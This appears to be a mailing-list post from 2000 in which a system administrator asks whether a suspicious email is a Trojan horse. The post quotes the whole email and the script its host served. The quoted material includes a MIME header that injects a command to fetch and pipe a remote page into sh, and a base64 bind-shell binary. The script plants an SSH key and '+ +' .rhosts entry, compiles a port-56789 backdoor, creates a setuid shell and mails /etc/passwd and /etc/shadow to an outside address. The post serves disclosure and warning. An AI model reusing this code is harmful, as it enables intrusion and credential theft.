Is it a TrajonHorse?
Hello,
I received an email attention to root with strange contents. The
whole email is shown for your reference.
When I read the logs attached with the mail, I don't find anything
(ip address, dns) relating to our domain.
Then I try to know where is the email from, so I point my browser to
http://tofan.onza.net. The browser ouputs
a page of shell scripts and program code! They as also attached at
the end of this mail. Then I start to scan the
whole email carefully, and find a line of strange Content-Type
statement as follows:
Content-Type: TEXT/PLAIN;
charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
name="emailf" Content-Transfer-Encoding: BASE64
Looks like to start Lynx to browse the page with the susipous codes,
then run the code to steal the /etc/passwd
file!
Seems like my Pine didn't run Lynx automatically..... but not sure
the harm to us yet!
Do you even receive some email like this? Any comments?
regards,
Tang.
UMac, INESC Macau
R.A.
============================== Begining of email
=============================
>From root@tofan.onza.net Mon May 15 15:18:55 2000
Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
for <root@neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
(CST)
Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
Version 5.5.2650.21)
id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@tofan.onza.net>
Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
From: root <root@tofan.onza.net>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
To: root@tofan.onza.net
Content-Type: MULTIPART/MIXED;
BOUNDARY="-1463811839-1047689522-958180505=:1450"
Status: RO
X-Status:
This message is in MIME format. The first part should be readable
text,
while the remaining parts are likely unreadable without MIME-aware
tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN; charset=US-ASCII
THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
FROM YOUR DOMAIN.
AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
Jerry Leininser
cops@tofan.onza.net
---2463811839-1047689522-958180505=:1450
Content-Type: APPLICATION/octet-stream;
name="log.txt.tofan.onza.net.exit"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.1000512211505.1450B@tofan.onza.net>
Content-Description:
f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
/yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
//8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
/v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
/f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
/4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
/IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
/wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
---2463811839-1047689522-958180505=:1450--
---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN;
charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
name="emailf" Content-Transfer-Encoding: BASE64
Content-Description: THE LOGS
Content-Disposition: attachment; filename="emailf"
PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
WE HAVE FACED A KERNEL PANIC!
Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
.S....
Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
.S....
Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
.S....
Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
.S....
Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
.S....
Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
.S....
Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1389 \
206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1412 \
206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1371 \
206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1412 \
206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
.S....
Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
209.16.136.144:1423 \
206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
.S....
---1463811839-1047689522-958180505=:1450--
================================ End of email
==============================
============================== Source of web page
==============================
grep "x4334@AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
then
if [ ! -d ~/.ssh ]
then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
echo "+ +" >> ~/.rhosts 2>/dev/null
fi
umask 022 >/dev/null 2>&1
echo "512 35
9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591
x4334@AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
cat << __EOF__ > /tmp/io.c
#define PORT 56789
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
int main (int argc, char **argv)
{
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
strcpy(argv[0],"updated");
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
&soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh", "-i",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
__EOF__
gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
/tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp
/bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc
>/dev/null 2>&1
rm -rf /tmp/io.c
rm -rf /tmp/io
mail -s hhp000 bjern3@attglobal.net >/dev/null 2>&1 < /etc/passwd
echo "`hostname -i 2>&1` - `id 2>&1`- `uname -a 2>&1`- `ls -al ~
2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3@attglobal.net
2>/dev/null
chmod og-w ~ >/dev/null 2>&1
chmod og-w ~/.ssh >/dev/null 2>&1
fi
============================== End of source of web page
==========================
Reply to: